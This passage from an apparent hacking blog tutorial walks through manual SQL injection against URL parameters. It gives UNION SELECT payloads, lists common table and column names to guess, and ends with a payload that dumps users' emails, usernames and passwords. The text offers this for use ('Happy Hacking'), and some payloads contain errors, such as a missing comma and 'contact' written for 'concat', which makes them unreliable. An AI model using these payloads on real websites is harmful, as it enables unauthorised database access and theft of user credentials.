Now as pointed before, if you're database is 4 and lower, you have a lil problem and it will be harder to get the tables.
If your database is 4 or lower.
Add the following at the end of the url :
+UNION+SELECT+1,concat
(table_name,CHAR(58),column_nameCHAR(58),table_schema)from information_schema.columns where column_name like CHAR(37, 112, 97, 115,37),3--
NOTE: If you have 5 available columns you will have to change it etc..
Now if you get no error and you see the tables you are fine, if not you are messed and you will probably have to guess the tables :(
Here are some known table names :
tbl_user, tbl_admin, tbl_access, user, users,
member, members, admin, admins, customer,customers, orders, phpbb_users, phpbb_admins,
Now just add the following at the end of the url :
+UNION+SELECT+1,2,3 from TABLE NAME HERE
So now I will guess the table name admins on My test url :
www.testwebsite.com/index.php/id=234+UNION+SELECT+1,2,3 from admin
Now just keep guessing until you find a table name that works ;)
Now lets say the following table worked :
www.testwebsite.com/index.php/id=234+UNION+SELECT+1,2,3 from users
Now we will have to guess the columns ;)
Common columns names are:
first_name, last_name, email, username,
password, pass, user_id, user_pass
Now we will test the table name, user_pass type in the following at the end of the url :
+UNION+SELECT+1,user_pass,3 from users
So it should look like this :
www.testwebsite.com/index.php/id=234+UNION+SELECT+1,user_pass,3 from users
Now just keep guessing until one of the columns works. :D
Now for example to get the user name, password and email type in the following at the end of the url :
+UNION+SELECT+1,contact
(email,0x3a,username,0x3a,password),3 from users
So this will give us the information of the admin :)
So this was the tutorial Hope you enjoyed ;)
Thank you.
Happy Hacking/Penetration testing :)
No comments:
Post a Comment